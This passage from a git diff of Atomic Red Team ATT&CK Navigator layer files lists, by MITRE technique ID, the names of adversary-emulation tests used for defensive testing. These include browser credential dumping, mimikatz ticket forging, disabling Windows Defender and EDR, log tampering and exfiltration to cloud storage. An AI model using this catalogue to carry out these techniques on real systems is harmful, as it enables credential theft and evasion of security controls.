Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n- Dump Chrome Login Data with esentutl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - 
Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":5,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n- ESXi - Remove Syslog remote IP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":58,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":10,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n- ESXi - Disable Firewall via Esxcli\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search 
Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 35163a6d68..73e9ecac00 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json 
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json 
@@ -1 +1 @@ -{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":48,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View 